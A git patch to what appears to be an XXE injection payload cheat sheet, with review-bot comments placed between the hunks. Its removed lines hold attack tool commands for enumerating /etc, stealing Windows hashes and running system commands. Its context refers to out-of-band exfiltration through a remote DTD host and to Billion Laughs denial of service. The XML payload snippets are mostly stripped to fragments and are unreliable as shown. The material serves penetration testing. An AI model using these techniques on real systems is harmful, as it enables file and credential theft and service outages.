From 846706b87dac4cbd74990d802f103f8fbb1c47ab Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Nov 2024 10:43:39 +0100
Subject: [PATCH] XXE on JSON Endpoints
---
XXE Injection/README.md | 172 +++++++++++++++++++---------------------
1 file changed, 82 insertions(+), 90 deletions(-)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index c0d3ffe..05908f4 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -6,34 +6,36 @@
## Summary
- [Tools](#tools)
-- [Detect the vulnerability](#detect-the-vulnerability)
-- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
+- [Detect The Vulnerability](#detect-the-vulnerability)
+- [Exploiting XXE to Retrieve Files](#exploiting-xxe-to-retrieve-files)
- [Classic XXE](#classic-xxe)
- - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded)
- - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
- - [XInclude attacks](#xinclude-attacks)
-- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
-- [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service)
+ - [Classic XXE Base64 Encoded](#classic-xxe-base64-encoded)
+ - [PHP Wrapper Inside XXE](#php-wrapper-inside-xxe)
+ - [XInclude Attacks](#xinclude-attacks)
+- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks)
+- [Exploiting XXE to Perform a Denial of Service](#exploiting-xxe-to-perform-a-denial-of-service)
- [Billion Laugh Attack](#billion-laugh-attack)
- - [YAML attack](#yaml-attack)
- - [Parameters Laugh attack](#parameters-laugh-attack)
+ - [YAML Attack](#yaml-attack)
+ - [Parameters Laugh Attack](#parameters-laugh-attack)
- [Exploiting Error Based XXE](#exploiting-error-based-xxe)
- [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
- [Error Based - Using Remote DTD](#error-based---using-remote-dtd)
-- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
+- [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
- [Blind XXE](#blind-xxe)
- [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
- - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
+ - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter)
- [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
+- [XXE with Local DTD](#xxe-with-local-dtd)
- [WAF Bypasses](#waf-bypasses)
- - [Bypass via character encoding](#bypass-via-character-encoding)
+ - [Bypass via Character Encoding](#bypass-via-character-encoding)
+ - [XXE on JSON Endpoints](#xxe-on-json-endpoints)
- [XXE in Java](#xxe-in-java)
-- [XXE in exotic files](#xxe-in-exotic-files)
- - [XXE inside SVG](#xxe-inside-svg)
- - [XXE inside SOAP](#xxe-inside-soap)
- - [XXE inside DOCX file](#xxe-inside-docx-file)
- - [XXE inside XLSX file](#xxe-inside-xlsx-file)
- - [XXE inside DTD file](#xxe-inside-dtd-file)
+- [XXE in Exotic Files](#xxe-in-exotic-files)
+ - [XXE Inside SVG](#xxe-inside-svg)
+ - [XXE Inside SOAP](#xxe-inside-soap)
+ - [XXE Inside DOCX file](#xxe-inside-docx-file)
+ - [XXE Inside XLSX file](#xxe-inside-xlsx-file)
+ - [XXE Inside DTD file](#xxe-inside-dtd-file)
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
- [Labs](#labs)
- [References](#references)
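Review bot: the retitled entry `Exploiting XXE to Perform SSRF Attacks` keeps the anchor `#exploiting-xxe-to-perform-SSRF-attacks` with uppercase `SSRF`; GitHub generates lowercase heading slugs, so this link will not resolve and should be `#exploiting-xxe-to-perform-ssrf-attacks`. The new title `Exploiting Blind XXE to Exfiltrate Data Out Of Band` also differs in casing from the heading this patch writes further down (`Out of Band`); pick one. Since the point of this hunk is consistent Title Case, `Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents` should get the same treatment, and the unchanged anchor `#xxe-oob-attack-yusonov---2013` does not match its title `XXE OOB Attack (Yunusov, 2013)`.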
@@ -41,58 +43,14 @@
## Tools
-- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
- ```ps1
- sudo ./xxeftp -uno 443
- ./xxeftp -w -wps 5555
- ```
-- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/)
- ```ps1
- $ python3 230.py 2121
- ```
-- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
- ```ps1
- # Enumerating /etc directory in HTTPS application:
- ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
- # Enumerating /etc directory using gopher for OOB method:
- ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
- # Second order exploitation:
- ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
- # Bruteforcing files using HTTP out of band method and netdoc protocol:
- ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
- # Enumerating using direct exploitation:
- ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
- # Enumerating unfiltered ports:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
- # Stealing Windows hashes:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
- # Uploading files using Java jar:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
- # Executing system commands using PHP expect:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
- # Testing for XSLT injection:
- ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
- # Log requests only:
- ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
- ```
-- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
- ```ps1
- ruby server.rb
- ```
-- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
- ```ps1
- ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx
- ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place
- ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place
- ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx
- ```
-- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.
- ```ps1
- python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
- ```
+- [staaldraad/xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
+- [lc/230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/)
+- [enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
+- [BuffaloWill/oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
+- [whitel1st/docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
-## Detect the vulnerability
+## Detect The Vulnerability
**Internal Entity**: If an entity is declared within a DTD it is called an internal entity.
Syntax: ``
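Review bot: this hunk removes every per-tool usage example (the xxeftp, 230-OOB, XXEinjector, oxml_xxe and docem invocations) and drops the otori entry entirely, while the commit subject mentions only XXE on JSON endpoints. If the trimming is intentional it belongs in the commit message; otherwise keep at least a one-line invocation per tool, since this list was the only place the README showed how each tool is run, or state that usage is documented in each project's own README.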
@@ -113,7 +71,7 @@ Basic entity test, when the XML parser parses the external entities the result s
It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
-## Exploiting XXE to retrieve files
+## Exploiting XXE to Retrieve Files
### Classic XXE
@@ -153,13 +111,13 @@ We try to display the content of the file `/etc/passwd`.
```
-### Classic XXE Base64 encoded
+### Classic XXE Base64 Encoded
```xml
%init; ]>
```
-### PHP Wrapper inside XXE
+### PHP Wrapper Inside XXE
```xml
]>
@@ -183,7 +141,7 @@ We try to display the content of the file `/etc/passwd`.
&xxe;
```
-### XInclude attacks
+### XInclude Attacks
When you can't modify the **DOCTYPE** element use the **XInclude** to target
@@ -194,7 +152,7 @@ When you can't modify the **DOCTYPE** element use the **XInclude** to target
-## Exploiting XXE to perform SSRF attacks
+## Exploiting XXE to Perform SSRF Attacks
XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
@@ -208,7 +166,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
```
-## Exploiting XXE to perform a denial of service
+## Exploiting XXE to Perform a Denial of Service
:warning: : These attacks might kill the service or the server, do not use them on the production.
@@ -225,7 +183,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
&a4;
```
-### YAML attack
+### YAML Attack
```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
@@ -239,7 +197,7 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
-### Parameters Laugh attack
+### Parameters Laugh Attack
A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping.
@@ -334,7 +292,7 @@ Let's break down the payload:
-## Exploiting blind XXE to exfiltrate data out-of-band
+## Exploiting Blind XXE to Exfiltrate Data Out of Band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
@@ -376,7 +334,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
%all;
```
-### XXE OOB with DTD and PHP filter
+### XXE OOB with DTD and PHP Filter
```xml
@@ -415,7 +373,7 @@ Send the XML file to the `deploy` folder.
Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
-## XXE with local DTD
+## XXE with Local DTD
In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
```xml
@@ -451,26 +409,33 @@ Assuming payloads such as the previous return a verbose error. You can start poi
]>
```
+
### Cisco WebEx
-```
+
+```xml
Your DTD code
%local_dtd;
```
+
### Citrix XenMobile Server
-```
+
+```xml
Your DTD code
%local_dtd;
```
-[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
+
+* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs.
+
## WAF Bypasses
-### Bypass via character encoding
+### Bypass via Character Encoding
XML parsers uses 4 methods to detect encoding:
+
* HTTP Content Type: `Content-Type: text/xml; charset=utf-8`
* Reading Byte Order Mark (BOM)
* Reading first symbols of document
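Review bot: the new bullet `* [GoSecure/dtd-finder](...)` uses `*` while the Tools list rewritten in this same patch uses `-`; the README already mixes both, but new lines should follow one style. Tagging the Cisco WebEx and Citrix XenMobile snippets as `xml` is a good change, though as shown each block contains only the placeholder `Your DTD code` and `%local_dtd;`, which is not a valid document on its own; a comment saying that the DOCTYPE wrapper ending in `]>` from the preceding section is still required would help readers.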
@@ -491,6 +456,31 @@ XML parsers uses 4 methods to detect encoding:
cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
```
+
+### XXE on JSON Endpoints
+
+In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**,
+
+| Content Type | Data |
+| ------------------ | ---------------------------------- |
+| `application/json` | `{"search":"name","value":"test"}` |
+| `application/xml` | `namedata` |
+
+
+* XML documents must contain one root (``) element that is the parent of all other elements.
+* The data must be converted to XML too, otherwise the server will respond with an error.
+
+```json
+{
+ "errors":{
+ "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."
+ }
+}
+```
+
+* [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4)
+
+
## XXE in Java
Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE:
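Review bot: the lead sentence `In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**,` ends with a comma and should end with a period or a colon introducing the table. In the table, the `application/xml` row reads only `namedata`, and the bullet below says `one root (``) element` with empty backticks, so the XML markup (the root, search and value elements) appears to be missing; show the full converted document so readers can see how the JSON keys map to elements. Two consecutive blank lines follow the table and again follow the extension link. The `org.xml.sax.SAXParseException` in the sample response identifies a Java SAX parser, so a one-line cross-reference to the `XXE in Java` section and its prevention references would tie the detection to the mitigation (hardening the parser, not the declared Content-Type, is what closes this).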
@@ -512,9 +502,10 @@ Ref.
- [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java)
- [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/)
-## XXE in exotic files
-### XXE inside SVG
+## XXE in Exotic Files
+
+### XXE Inside SVG
```xml